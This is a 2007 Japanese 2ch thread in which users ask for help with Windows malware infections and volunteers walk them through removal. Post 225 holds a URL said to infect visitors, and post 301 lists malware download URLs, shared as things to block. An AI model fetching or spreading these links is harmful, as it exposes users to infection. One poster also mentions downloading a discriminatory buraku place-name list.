220 :名無しさん@お腹いっぱい。:2007/01/17(水) 01:24:38
>今スパイウェアを駆除しようと友達のPCからSpybotをダウンロードしてきたんですが

ここの経緯とかインスコ方法に問題がありそうな気がするが

221 :名無しさん@お腹いっぱい。:2007/01/17(水) 02:57:59
>>220あるあるw
>>218 “210”さんもう一回基本確認してみて!
↓spybotS&Dテンプレから引用

(レジストリに何らかの改変が加わってていた場合手遅れかも試練)

■最初にすること(遅いがね
Spybot、SpywareBlasterを(必要に応じて CustomBlocking Updater も)インストール
 ↓
インターネットのキャッシュファイルを(問題が無ければクッキーも一緒に)クリアして、ブラウザを閉じる
 ↓
SpywareBlaster定義ファイル&日本語Dialerリストのアップデート
 ↓
Spybot定義ファイルアップデート・免疫化
 ↓
ファイル設定→全てにチェックを入れる
 ↓
Spybotでスキャン・駆除
 ↓
セーフモードから再びSpybotでスキャン・駆除
 ↓
 (゚д゚)ウマー


222 :名無しさん@お腹いっぱい。:2007/01/17(水) 03:00:16

■次からすること
インターネットのキャッシュファイルを(問題が無ければクッキーも一緒に)クリアして、ブラウザを閉じる
 ↓
SpywareBlaster定義ファイル&日本語Dialerリストのアップデート
 ↓
Spybot定義ファイルアップデート・免疫化の再チェック
 ↓
Spybotでスキャン・駆除
 ↓
余裕があるなら、セーフモードから再びSpybotでスキャン・駆除
 ↓
 (゚д゚)ウマー


SpywareBlasterが必要なら余裕を見て入れて下さい。

223 :名無しさん@お腹いっぱい。:2007/01/17(水) 03:12:28
ありがとうございます
難しいですが頑張ってやってみます!

224 :誘導します221=222:2007/01/17(水) 03:30:00
>>223
明日にでも覗いてみればいいです。
(携帯は辛いでしょうが)
ttp://pc10.2ch.net/test/read.cgi/sec/1168611359/l50
スパイウェア削除ソフト Spybot35



225 :名無しさん@お腹いっぱい。:2007/01/17(水) 04:11:32
【使用OS】
WindowsXPHome
【MicrosoftUpdate】
しています
【使用セキュリティソフト】
NortonAntiVirus2006 等
【セキュリティソフトの定義ファイルは最新の状態であるか】
はい
【ルータの有無】
あります
【スキャンの結果何が検出されたか】
ad-aware、spybot、ノートン等、検出されなかった
【どんな症状が出たのか】
リンク先を踏んだ後、telnet、outlook、realplayer、IEが勝手に起動、
侵入者に対する試み(HTTP MS WINDOWS WMF Code Exec)は、ノートンが侵入を防止。
【その他の質問】
ttp://newsheadlines.5u.com/spots/baseball/20070117-00000053-nks.html
(開くとウイルスに感染します)
このサイトを開いた後、ノートンが活動してくれて、侵入を防御してくれたんですが
その後、気になってした、スキャンには、全くウイルスの痕跡はなし。
これはウイルスに感染してなくて、大丈夫ということでしょうか?
単に侵入を単発で試みただけ?




226 :名無しさん@お腹いっぱい。:2007/01/17(水) 10:48:40
>>225
インターネットゾーンの設定が弱いんだろ
そのままじゃいづれ感染するよ
勉強し直せ

227 :名無しさん@お腹いっぱい。:2007/01/17(水) 17:59:43
【使用OS】
WindoesXPHomeSp2
【MicrosoftUpdate】
そういやしてなかったorz
【使用セキュリティソフト】
NortoninternetSecurity2005
【セキュリティソフトの定義ファイルは最新の状態であるか】
したばっかりです
【ルータの有無】

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
検出されない
【どんな症状が出るか】
「C:\WINDOWS\TEMP\E927.tmp」
等アルファベット+数字の4桁.tmpが自働で作成、実行されどっかと通信しようとする
一応ノートン先生が警告してくれるけど、起動ごとに新しい警告が出る
【症状が出る前に何をやったか】
思い当たる節がありません・・・
【症状を解決しようとどのような処置を取ったか】
タスクマネージャにてtmp実行プログラム強制終了、その後削除
ウイルスチェック
【その他の質問】


この症状が出る前に(もしくは出てる最中)ノートンのウイルスメールチェックが
狂ったように起動した症状が出たので怪しいと思われる
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5
内のvideo[1].exeやmessage[1]などのファイルを全て削除。
普通に削除しても復活するファイルでしたがもう出てきてないのでウイルス除去はできたと思うのですが
上記の症状に関係するのかも・・・?
どなたか助けてください;

228 :名無しさん@お腹いっぱい。:2007/01/17(水) 18:07:00
>>227
Symantec以外のオンラインスキャンを試してみたら?
あとは、BitDefenderならノートンで検出できないものでも対処できるし、
非常駐型でノートンとは競合一切起こさないから安心だよ。

229 :名無しさん@お腹いっぱい。:2007/01/17(水) 18:07:24
>>227
★シマンテック・セキュリティチェック (*無償オンライン ウィルススキャンサービス)
http://www.symantec.com/region/jp/securitycheck/index.html

230 :名無しさん@お腹いっぱい。:2007/01/17(水) 18:10:48
>>227
ちなみにNortoninternetSecurity2005 はスパイウェアに対応してないよ
「Spybot」と「Ad-Aware SE」もためしたほうがいいしインターネットゾーンの設定も見直したほうがいい

231 :名無しさん@お腹いっぱい。:2007/01/17(水) 18:22:55
【使用OS】  「」
【Windows Updateの状態】  「」 
【使用セキュリティソフトとバージョン】  「」
【セキュリティソフトの定義ファイルは最新の状態であるか】  「」 
【スパイウェア対策ソフト】  「」 
【ルータの有無】  「」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】  「」
【どんな症状が出るか】  「」
【症状が出る前に何をやったか】  「」
【症状を解決しようとどのような処置を取ったか】  「」
【その他の質問】  「」


見にくいんで少し手直ししてみたのと、
スパイウェア対策ソフトの行を追加してみたけどどうですか?

232 : ◆N9P3SuvBPo :2007/01/17(水) 18:23:26
>227
>【MicrosoftUpdate】
>そういやしてなかったorz
ウソを付くな
SP2ならデフォルトで自動更新になってるから最新のはずだ。

233 :名無しさん@お腹いっぱい。:2007/01/17(水) 18:24:38
>>228
>>229
>>230
あまりのレスの速さに( ゚Д゚)ポカーン
重くなるのが嫌で今までNorton2005で頑張ってたんですが
さすがにもう限界かもしれませんね。
教えて頂いたものをひとつずつ試してみます!
どうもありがとう!

234 :名無しさん@お腹いっぱい。:2007/01/17(水) 18:26:18
>>232
設定で手動にできませんでしたっけ?
ネトゲーやるとき起動したら重くなりそうだから切ったような記憶が・・・
記憶違いかもしれませんが

235 :名無しさん@お腹いっぱい。:2007/01/17(水) 18:28:42
>>233
でもNIS2007はやめとけ
後悔するぞ
どうしてもというなら、体験版でやってみてからにしろ

236 :名無しさん@お腹いっぱい。:2007/01/17(水) 18:35:29
「NIS2007のセキュリティインスペクタ機能」+「Spybot」+「Ad-Aware SE」+「Spyware Blaster」
でスパイウェア対策は問題無いよ
http://pc10.2ch.net/test/read.cgi/sec/1168657377/l5


237 : ◆N9P3SuvBPo :2007/01/17(水) 18:36:36
>234
たしかにセキュリティセンターから無効にできますね。

>231


【Windows Updateの状態】→【Microsoft Updateの状態】にしては?
【使用セキュリティソフト】は【スパイウェア対策ソフト】も含むという意味でしたが…

ちなみにこの前のテンプレは以下でした。
【使用OS】
【WINDOWS UPDATE】
【ウィルスソフト】
【UPDATE】
【スキャン】
【症状】
【やったこと】
【とった処置】

その前のは以下
【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】

その前のテンプレはどうったか分かりません。

238 :231:2007/01/17(水) 18:40:48
ああ本当だ
Microsoft Updateって言うんだ

239 : ◆N9P3SuvBPo :2007/01/17(水) 18:58:05
>238
ふむ、一部はセキュリティ初心者スレからの抜粋ですか。
あちらのほうは今のままでもいいでしょう。

今使ってるOSは実はオフィスのインストールはしてないんですね。
つまりオフィス製品が無いってことは、WordやExcelなどのオフィス関連の
アプリケーションが実行できない=オフィスを狙った脆弱性(Exploit)は効かない。
去年、初リカバリの後、オフィスをインストールしようかと迷ったのですが、
オフィスに脆弱性があり、これからもこのソフトを狙ったExploit-Codeが出てくるだろうと
同時に「インストールするのがめんどくさい」という下らない理由で入れていないのです。

「基本的な対策をしていれば大丈夫」…今まではこれで凌ぐ事ができましたが、
これからは「基本以上の対策をしなければならない時代」になりつつあるかもしれません。

240 :名無しさん@お腹いっぱい。:2007/01/17(水) 19:22:17
Wordなんかだと、オプションのセキュリティタブの中に
・保存時のファイルのプロパティから個人情報を削除する
・マクロの実行セキュリティのレベル
とかセキュリティの要所があるよね

241 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:20:00
NIS2005とSPYBOTSD、Ad-AwareSEで引っかからなかったが、カルスペのKISトライアルを使ったら
かなり引っかかった。ただプロアクティブディセンスが重い気が。
NIS2007もやっと対応してきたみたいだけどどうなんだろう。

ウイルス Virus.Win32.Delf.aq
トロイ Trojan-Downloader.Win32.Small.czl
トロイ Trojan-PSW.Win32.Delf.mc
トロイ Trojan-PSW.Win32.OnLineGames.bs
トロイ Trojan-PSW.Win32.WOW.md
ほかにもぞろぞろ出てきたけど
ノートン先生やってくれるねって感じだね。
今まで何をしていたんだろうか。

242 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:24:29
>>241
2ちゃんねる専用ブラウザのdatログを誤検知じゃないよね

243 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:31:56
リカバリしたとき以来、面倒だったから専用ブラは入ってないよ。
C:\Program Files\Common Files\Microsoft Shared\MSInfo\WinInfo.bak/UPX
C:\RECYCLER\NPROTECT\00007594.dll/CryptFF
C:\WINDOWS\system32\Downdll.dll
C:\RECYCLER\S-1-5-21-3753018816-1203752577-514352727-1007\Dc548.exe
C:\WINDOWS\system\logo_1.e
など

244 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:39:42
すいません、日本語が変かもしれませんが、
パソコンがInfostealer.Gampassという
ウイルスに
Windowsのsystem32のagty.dllが感染していまして、
そこをノートンでスキャンして削除したのですが
まだ感染しているらしく、また同じ場所をスキャンして削除してもまだ感染して‥
と、ウイルスとノートン(1/12に更新された最新のもの)のイタチごっこが続いています。

DELLのサポートセンターに電話しても、ノートンを最新に更新するか、初期化か、と言われ、
更には何故かサーバーに繋がらなずインターネットが使えない状態なのです。
一体どうすれば良いのでしょうか?
よろしければ何か助言を頂けるとうれしいです。

245 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:39:46
G-DATAはカルスペとavastから提供受けてるみたいだけどかなり重いといううわさ。

246 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:42:32
一箇所だけのスキャンじゃだめだよ。
全体の完全スキャンしないと。

あとノートンの何を使ってるのか。

247 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:44:02
>>244
【アダ被の部屋】Wiki
「質問掲示板ミニトラブル & ミニ知識「Norton」編 (2007 年度版以降)のセーフモードでウイルススキャンする方法

248 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:45:19
マルウェア、ルートキット、ワームとか最近いっぱいあるしね。

249 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:47:17
古いバージョンだったら削除して、一時的にもトライアルの最新版を使ったほうがいいかも。

250 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:47:30
そういや今日見た雑誌に
独でG-DATAがシェア1位ってなってたな


251 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:48:15
trendのrootkit busterなぜかうちのpcでは動作しないorz


252 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:49:50
ブランド好きの日本人はノートン先生なのかな。
最近首位陥落みたいだけど

253 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:51:14
ソフトはほかとの相性という面も大きいからね。

254 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:52:02
>>246
いえ、一度全体をスキャンして、
そして出てきた奴をプログラムに乗っ取って
削除したのですが、
なぜかまだ感染しているのです。

>>247
詳しく教えていただけないでしょうか?

255 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:54:33
ノートンは過去のものの更新キー購入継続版なの?
それとの2007年度版の最新なの?

256 :247:2007/01/17(水) 20:55:02
>>254
これでぐぐってみて
「「質問掲示板ミニトラブル & ミニ知識「Norton」編 (2007 年度版以降)」

257 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:56:32
あとタスクマネージャ開いて不自然なの動いてない。
また勝手にウィルスが裏でネット接続してないかな。

258 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:57:10
>>255
実はその違いで
性能差があるんだよな・・・

259 :名無しさん@お腹いっぱい。:2007/01/17(水) 21:00:15
更新キーものは定義だけで、機能はジム並みなんだよね。

260 :名無しさん@お腹いっぱい。:2007/01/17(水) 21:02:05
さすがのシャアも木馬にてこずった挙句、負けちゃったし。

261 :名無しさん@お腹いっぱい。:2007/01/17(水) 21:06:42
一応
http://www.trendmicro.co.jp/consumer/products/trial/
http://www.symantecstore.jp/trial/index.asp
http://www.kaspersky.co.jp/trial/
http://jp.mcafee.com/root/landingpages/default.asp?lpname=ms_vso&cid=8448/

262 :名無しさん@お腹いっぱい。:2007/01/17(水) 21:13:18
すいません、色々とありがとうございます。

しかし、ノートンを更新しようとも
肝心ねサーバーに繋がらない為どうすりゃいいやら‥

サーバーに繋がらない原因ってなんなのでしょう?

263 :名無しさん@お腹いっぱい。:2007/01/17(水) 21:23:28
ノートンのliveupdateでけに繋がらないという意味なの?
ネット自体繋がらないの?
バージョン更新キーじゃない2007でいいの

264 :名無しさん@お腹いっぱい。:2007/01/17(水) 21:28:37
ありがとうございます。
やってみます

265 :名無しさん@お腹いっぱい。:2007/01/17(水) 21:35:11
>>264
次からはテンプレ使って書いてさいね。
ビジー状態だと思われますよ。間を置いてやってみて
で263の答えは?書き込みできてるみたいだから、シマンテックの更新だけか?


266 :名無しさん@お腹いっぱい。:2007/01/17(水) 21:44:27
すいません。
なにぶんパソコンのサーバーがまったく繋がらなず、
しかも何世代も前の携帯から書き込んでいる為
テンプレさえまともに見ませんでした。

267 : ◆N9P3SuvBPo :2007/01/17(水) 22:15:14
>244
ずっと前ならHijackThisのFIX処理orセーフモードでシステムの復元だけで
問題解決してたんだけど、今は復元妨害したり、HijackThisでFIXしても
FIXしたエントリを復活させる奴がいるからな。
リカバリ(初期化)が一番かと思われますよ。
ノートンを最新にしても完全に駆除できる保証は無いから。

268 :名無しさん@お腹いっぱい。:2007/01/17(水) 23:36:03
【使用OS】 winXP
【MicrosoftUpdate】 してます
【使用セキュリティソフト】 ノートン
【セキュリティソフトの定義ファイルは最新の状態であるか】 最近期限が切れました
【ルータの有無】 有?
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 Trojan Pigeon GZ si(Backdoor.Graybird)
【どんな症状が出るか】 どこかのPCにアクセスしようとする
【症状が出る前に何をやったか】 ネットサーフィン
【症状を解決しようとどのような処置を取ったか】 色んなサイトで検索したらe-trastとSpyware Doctorで検出されました。
【その他の質問】
シマンテックのサイトを見てやってみてもSvch0st.exeを終了するとPCが終了してしまうし、
Svch0st.exeが5個あるのでどれがウイルスか分かりません・・・
オンラインで駆除できるサイトがなくて(というか検出されない)手動でやるしかないのですがどうすれば除去できるでしょうか?

269 : ◆N9P3SuvBPo :2007/01/17(水) 23:41:58
>268
Svch0st.exe?
Svchost.exeじゃなくて

270 :名無しさん@お腹いっぱい。:2007/01/17(水) 23:51:31
Svchost.exeです。シマンテックのサイトからコピペしたんだけど間違ってますね・・・

271 : ◆N9P3SuvBPo :2007/01/18(木) 00:25:40
>270
この「Trojan Pigeon GZ si(Backdoor.Graybird)」がどの場所で検出されたかは知らない?

ネットサーフィンだけでこのようなウイルスに感染することは無いと思うんですが。

272 :名無しさん@お腹いっぱい。:2007/01/18(木) 00:32:52
Key "hkey_local_machine \"かな?
昨日からおかしくて昨日はネットサーフィンしかしてないんです。
winnyで落としたものは必ずスキャンしてるし・・・

273 : ◆N9P3SuvBPo :2007/01/18(木) 00:40:11
>272
調べてきたぞ。
これですね↓
ttp://www.symantec.com/region/jp/sarcj/data/b/backdoor.graybird.b.html

たしかにSvch0st.exeでしたね。
0(ゼロ)とo(オー)を見間違えないように良く見てもう一度駆除作業を行ってください。

あと最後の行はどういう意味かなw

274 :P2Pは禁止だからな:2007/01/18(木) 00:57:33
>>272
何となくわかってたけどねwwww
     ↓
「仁義なきキンタマ」は、svchost.exeという名前で活動をします。
svchost.exeは、普通にWindowsを動かしていれば複数個動いていてもまったく問題ありません。
そのために、誤ってWindowsの作動に必要なsvchostを削除してしまうという人が後を絶ちません。
そこで、ウイルス本体と無害なsvchost.exeの見分け方を書いておきます。

まず、Ctrl+Alt+Delでタスクマネージャーを開いてください。
次にプロセスタブを開きます。
すると、svchost.exeというのが動いていると思います。
そのときに、そのsvchost.exeを動かしているのが誰なのかを見てください。
svchost.exeの右隣にある文字がそれです。
それが、「SYSTEM」、「NETWORK SERVIVE」、「LOCAL SERVICE」などなら問題はありません。
しかし、実行しているユーザー名が感染しているマシンのユーザー名(Ownerなど)の場合だと、
それは「仁義なきキンタマ」である可能性があります。
それだと思われるプロセスを見つけた場合は、そのプロセスをクリックして「プロセスの終了」をクリックしてください。
警告がでると思いますが、「はい」を押してください。そして、下記の駆除を行ってください。


275 :名無しさん@お腹いっぱい。:2007/01/18(木) 00:58:01
>>273
windos.dll
windos.exe
windos_hook.dll
%windows%\windos_hook.dll
%windows%\windos.dll
%windows%\windos.exe
ファイル名は↑みたいです。 すみません・・・<最後の行
レジストリを書き換えられるって書いてあるけど見ても見つからないんです。亜種・・・?
Svchost.exeが5個あってユーザー名がSYSTEMのが2個、NETWORK SERVICEが2個、
LOCAL SERVICEが1個でどれを終了させればいいのか・・・
トロイが繋ごうとしてる回線業者に連絡しても意味ないかなぁ・・・

276 :P2Pは禁止だからな:2007/01/18(木) 01:03:59
>>272
【駆除方法】
対応済みのウイルス対策ソフトの導入をオススメします。
手動で駆除する場合は、以下のコピペを参考にして、自己責任でお願いします。


277 : ◆N9P3SuvBPo :2007/01/18(木) 01:08:33
>275
>Svchost.exeが5個あってユーザー名がSYSTEMのが2個、NETWORK SERVICEが2個、
>LOCAL SERVICEが1個
それなら問題無い。
結局>268で言っていた「Svch0(ゼロ)st.exe」という名前のファイルは
PC内のファイルを検索しても、目視でも確認できず、さらにレジストリの検索でも見付からない
ということで、実際検出されたのは>275で述べたファイル群ですよね。
とりあえず、windos.dllやwindos.exeとかをググってみて。

278 :P2Pは禁止だからな:2007/01/18(木) 01:08:55
>>272、272、272,272
Ctrl+Alt+Deleteでタスクマネージャーを表示
svchost(ユーザー名で実行されている物)のプロセスを切る。



279 :278:2007/01/18(木) 01:15:47
C:\WINDOWS\system32\drivers\svchost.exeを削除。↑をしないと実行中の為、削除不可


280 :278:2007/01/18(木) 01:17:31
スタートボタン→ファイル名を指定して実行「Msconfig」→スタートアップ→Svchost.exeのチェックをOFF(場所がwindows\drivers-autoとなっているの分かりやすい)orレジストリエディタで C:\WINDOWS\Msnie にあるexeを削除
C:\WINDOWS\system32\wbem にあるexeを削除
・・・などばらまかれたexeを削除

終わります◆N9P3SuvBPo 氏
申し訳なかった^^

281 :名無しさん@お腹いっぱい。:2007/01/18(木) 01:24:45
272にユーザー名で動いてるSvchost.exeは無いみたいだが・・・

282 : ◆N9P3SuvBPo :2007/01/18(木) 01:26:15
>278
>(ユーザー名で実行されている物)
ユーザー名=現在ログオン中のユーザー名?

>280
うん。
しかし彼が言うにはsvchost.exeではなくsvch0st.exeなんですが…
もし本当にsvchost.exeからの検出であれば、検出されたファイルの正確な場所を尋ねますけどね。
それかHijackThisのログをここに貼らせて、確認するのも手だし。

そういえばsvchost.exe(正規ファイルの方)はc:\windows\system32\でしたっけ?
それ以外の場所で見付かったら、間違い無くAntinny系ということですよね。
本当のこと言うとAntinny系ウイルスとは関わりたくないものですが…

283 :278:2007/01/18(木) 01:31:38
ユーザー名で動いてなければ俺の
誤爆ですな。
svchost.exeはよく判断が曖昧なのだが。。

284 :278:2007/01/18(木) 01:43:59
>それ以外の場所で見付かったら、間違い無くAntinny系ということですよね。

俺の見解は
99.99999999%位ですね

>しかし彼が言うにはsvchost.exeではなくsvch0st.exeなんですが…
怪しいですな

285 : ◆N9P3SuvBPo :2007/01/18(木) 01:50:02
>284
最後にもうひとつだけですが、>274にて
>「仁義なきキンタマ」は、svchost.exeという名前で活動をします。
とありますが、果たして本当にそう言いきれますか?
Antinnyの中には"C:\Program Files\<ランダムにコピーされたフォルダ>\<ランダムにコピーされた名前>.exe"
で活動するのだってありますよ。

>怪しいですな
彼を信じてあげましょうよ。

286 :名無しさん@お腹いっぱい。:2007/01/18(木) 01:57:45
>>280
スタートボタン→ファイル名を指定して実行「Msconfig」→スタートアップ→Svchost.exeの
Svchost.exeが見当たりません。一覧にwindows\drivers-autoもないです。
一人で使ってるからログオンとかがないのでそのせいでしょうか??
5個あるのはsvch0st.exeじゃなくてsvchost.exeです。

PC内をsvchost.exeで検索したらWINDOWS\system32に一つと、
WINDOWS\PrefetchにSVCHOST.EXE-3530F672.pfというのが出てきました。
SVCHOST.EXE-3530F672.pfはゴミ箱に入れたほうがいいでしょうか?

今シマンテックでもう一度スキャンしたらDownloader.Trojanというのが検出された・・・orz

287 :278:2007/01/18(木) 01:57:57
>>285
いいえ言い切れませんよ。
P2Pをしているのはわかったので、
バックグラウンドで動くexeは安易に切っては
ならないと警告を与えたまでです。

>Antinnyの中には"C:\Program Files\<ランダムにコピーされたフォルダ>\<ランダムにコピーされた名前>.exe"

知っています。

288 : ◆N9P3SuvBPo :2007/01/18(木) 02:09:51
>287
P2Pソフトを使う人って何で使うのかが疑問ですね。
「タダで手に入るから」という下らない理由が大半でしょうがw

>286
>C:\WINDOWS\PrefetchにSVCHOST.EXE
正体を確認してみましょう。
そのファイルのプロパティ画面を開いてみて
「会社名」はなんと言う会社になっているか教えていただけるとありがたいです。
Microsoft Corporation以外であれば黒の可能性大です。

289 :名無しさん@お腹いっぱい。:2007/01/18(木) 02:25:10
不明なアプリケーションで拡張子を変えたりしても会社名はわかりませんでした。
落としたのはエロと部落地名総監です・・・

290 : ◆N9P3SuvBPo :2007/01/18(木) 02:33:32
>289
会社名は不明?
ふむ…さらに調査を続けましょうか。
ttp://www.virustotal.com/
「参照」ボタンをクリックして、C:\WINDOWS\Prefetch\SVCHOST.EXEを選択して
Sendというところをクリックするとスキャンが始まります。
しばらく待っていればスキャンが終わり、結果が表示されますので
そのログを貼りつけてもらえますか。

291 :名無しさん@お腹いっぱい。:2007/01/18(木) 02:43:10
AntiVir 7.3.0.21 01.17.2007 no virus found
Authentium 4.93.8 01.16.2007 no virus found
Avast 4.7.936.0 01.17.2007 no virus found
AVG 386 01.17.2007 no virus found
BitDefender 7.2 01.17.2007 no virus found
CAT-QuickHeal 9.00 01.17.2007 no virus found
ClamAV devel-20060426 01.17.2007 no virus found
DrWeb 4.33 01.17.2007 no virus found
eSafe 7.0.14.0 01.17.2007 no virus found
eTrust-InoculateIT 23.73.115 01.17.2007 no virus found
eTrust-Vet 30.3.3332 01.17.2007 no virus found
Ewido 4.0 01.17.2007 no virus found
Fortinet 2.82.0.0 01.17.2007 no virus found
F-Prot 3.16f 01.16.2007 no virus found
F-Prot4 4.2.1.29 01.16.2007 no virus found
Ikarus T3.1.0.27 01.09.2007 no virus found
Kaspersky 4.0.2.24 01.17.2007 no virus found
McAfee 4941 01.17.2007 no virus found
Microsoft 1.1904 01.17.2007 no virus found
NOD32v2 1985 01.17.2007 no virus found
Norman 5.80.02 01.17.2007 no virus found
Panda 9.0.0.4 01.16.2007 no virus found
Prevx1 V2 01.17.2007 no virus found
Sophos 4.13.0 01.16.2007 no virus found
Sunbelt 2.2.907.0 01.12.2007 no virus found
TheHacker 6.0.3.148 01.14.2007 no virus found
UNA 1.83 01.16.2007 no virus found
VBA32 3.11.2 01.16.2007 no virus found
VirusBuster 4.3.19:9 01.17.2007 no virus found

eTrustのオンラインスパイウェアスキャンで出たのとは違うのかな・・・?

292 :名無しさん@お腹いっぱい。:2007/01/18(木) 02:44:27
Aditional Information
File size: 16490 bytes
MD5: e438f4e5f19dcd029fbeb356b0a438db
SHA1: 8070a967b2fa0c4ff318937cb14e37e112889999
これで全部です。

293 : ◆N9P3SuvBPo :2007/01/18(木) 02:53:13
>291-292
no virus found=ウイルス無し
ということなのでそちらは問題ありません。

294 :278:2007/01/18(木) 02:54:03
遅くなりましたが、まぁそんなとこですな

今日早いので落ちますね
どうも。あとはお任せします

部落地名総監。。。
一時ニュー速で流行ったな。
あと公務員棒給名簿、芸能界(ry





295 : ◆N9P3SuvBPo :2007/01/18(木) 02:59:27
>294
俺ももう限界!
おやすみなさい

296 :名無しさん@お腹いっぱい。:2007/01/18(木) 03:03:08
お二方ありがとうございました!

297 : ◆N9P3SuvBPo :2007/01/18(木) 03:05:54
おっと最後に>286にて
>Downloader.Trojanというのが検出された
とありますが、こちらのほうは検出されたウイルスの名前やファイル名などを
検索して自分の力でやってもらえますか。
では

298 :名無しさん@お腹いっぱい。:2007/01/18(木) 03:45:20
you tubeを始め動画や画像が見れなくなりましたorz
他にも本来表示されるべき物が表示されず□の中に赤い×が表示されるようになりました
前は見れたのに突然見れないようになりだしました。
ウイルスが原因なんでしょうか?どなたかわかるかたがいたらどうか教えてください。
OSはWINDOWS XPです。

299 :227:2007/01/18(木) 11:38:11
>>228-230
で教えてもらった方法全て試してもダメでした。レジストリまでいじったのに・・・
なんつーしぶといウイルスだ
しかしノートンでは検出0だったのに他のソフトだと腐るほどウイルスでてきますね
ノートン先生のセキュリティってザルですか?
もうお手上げなのでリカバリ逝ってきます(゚Д゚)ノ

300 :名無しさん@お腹いっぱい。:2007/01/18(木) 15:05:28
>>227
ちなみにログビューアのファイアウォールの活動の内容を見れば
いつ、何が繋ぎにいってるかは判るよ

301 :名無しさん@お腹いっぱい。:2007/01/18(木) 17:41:48
俺も前に
add.rr121.com/
220.162.247.180
http://search.mse.co.jp/
http://add.rr121.com/l/New/svchost32.exe
http://add.rr121.com/l/New/csrss.exe
http://www.y988.com/l/Url168.txt
http://asd.rr121.com/l/New/services.exe
http://asd.rr121.com/l/New/conime.exe
http://add.rr121.com/l/New/smss.exe
http://www.y988.com/tempbak.exe
http://207.44.136.40/public/personalwu.dat
http://download.lavasoft.de.edgesuite.net/public/personalwu.dat
http://download.lavasoft.de/public/personalwu.dat
http://ads1.msn.com/library/dap.js
に勝手につながってたな
そん時はファイヤーウォールでアク禁にしてウィルス除去したけど。

msconfigで変なのあったりして

302 :名無しさん@お腹いっぱい。:2007/01/18(木) 20:35:50
W32.Fujacks.AF
W32.Fujacks.AF は、ネットワーク共有へ自分自身をコピーすることによって拡散するワームです。
このワームは、すべてのパーティションの root ドライブへ自分自身をコピーし、
ローカルコンピュータ上で見付けたすべての .exe ファイルに感染します。
またこれは、いくつかのセキュリティ関連のプロセスやサービスを終了させます。
http://www.symantec.com/region/jp/avcenter/venc/data/jp-w32.fujacks.af.html


303 :名無しさん@お腹いっぱい。:2007/01/18(木) 21:21:26
【使用OS】Windows XP SP1
【MicrosoftUpdate】してません
【使用セキュリティソフト】ウイルスバスター2007 体験版
【セキュリティソフトの定義ファイルは最新の状態であるか】違います
【ルータの有無】NEC WR6600H
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】PE VIRUT.B
【どんな症状が出るか】不明
【症状が出る前に何をやったか】不明
【症状を解決しようとどのような処置を取ったか】

回線を抜いた状態でリカバリー後、ノートン2007パッケージ版をインストールしようと思っても
「Windows インストーラの認識中に問題があったのでセットアップのインストールができません。」
と出ます。
そのため別PCでバスターの体験版をCD-Rに焼いてインストールしました
検索すると350件くらい感染
削除・隔離できませんが7件くらいです。

リカバリーしても駆除できないので困ってます
助けてください!!

304 :名無しさん@お腹いっぱい。:2007/01/18(木) 21:43:01
【使用OS】                Windows XP SP2
【MicrosoftUpdate】          常時更新
【使用セキュリティソフト】  ノートンインターネットセキュリティ2006
【セキュリティソフトの定義ファイルは最新の状態であるか】   更新しました
【ルータの有無】                              なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】  Backdoor.Win32.Agent.xs  と   Trojan.Win32.KillFiles.ki
【症状が出る前に何をやったか】                            不明です
【症状を解決しようとどのような処置を取ったか】                  手動駆除をしようとウィルス情報を検索しました


インストールしているのはNIS2006ですがカスペエンジンでオンラインスキャンした結果ウィルスiが見つかりました
もう3週間ほど経っていますがカスペの方ではまだ解決方がでていません。↓がその情報です
http://translate.google.com/translate?sourceid=navclient&hl=ja&u=http%3a%2f%2fwww%2eviruslist%2ecom%2fen%2fviruses%2fencyclopedia%3fvirusid%3d125040
http://www.viruslistjp.com/viruses/encyclopedia/?virusid=117550

なお感染場所は
C:\System Volume Information\_restore{E22BDD9D-9D72-4519-9780-75307FB35B4B}\RP137\A0010167.exe感染: Backdoor.Win32.Agent.xs
C:\System Volume Information\_restore{E22BDD9D-9D72-4519-9780-75307FB35B4B}\RP137\A0010168.exe感染: Backdoor.Win32.Agent.xs
C:\System Volume Information\_restore{E22BDD9D-9D72-4519-9780-75307FB35B4B}\RP147\A0010713.SCR 感染: Trojan.Win32.KillFiles.ki

となっています。
よろしくお願いします

305 : ◆N9P3SuvBPo :2007/01/18(木) 22:10:21
>304
>System Volume Information
これはシステムの復元のバックアップを保存するフォルダなので、
マイコンピュータのプロパティ→復元タブ→復元無効→即復元有効で処理できます。
それでもう一度スキャンして見付からなければOKです。

問題は>303だな
リカバリしても直らんだと!?
ちゃんと説明書の手順に沿って、HDDフォーマットしてOS入れたんですよね。

ちょっとだけ調査に付き合ってもらえますか?
デスクトップにあるマイコンピュータをダブルクリックして開く

Cドライブのアイコンをダブルクリックして開く

その中にあるwindowsフォルダを開く

その中にあるexplorer.exe(マイコンピュータのアイコン)のファイルを
右クリック→プロパティで以下の情報を教えてもらえますか?
・ファイルサイズ
・更新日
など
なお、このファイルは正規のファイルですので絶対に削除しないように

306 :名無しさん@お腹いっぱい。:2007/01/18(木) 22:25:20
>>303のいうリカバリとやらの手順についても書いて貰いたい
ウィルスの見つかった場所もあるとなお可

307 :304:2007/01/18(木) 23:19:33
>>305
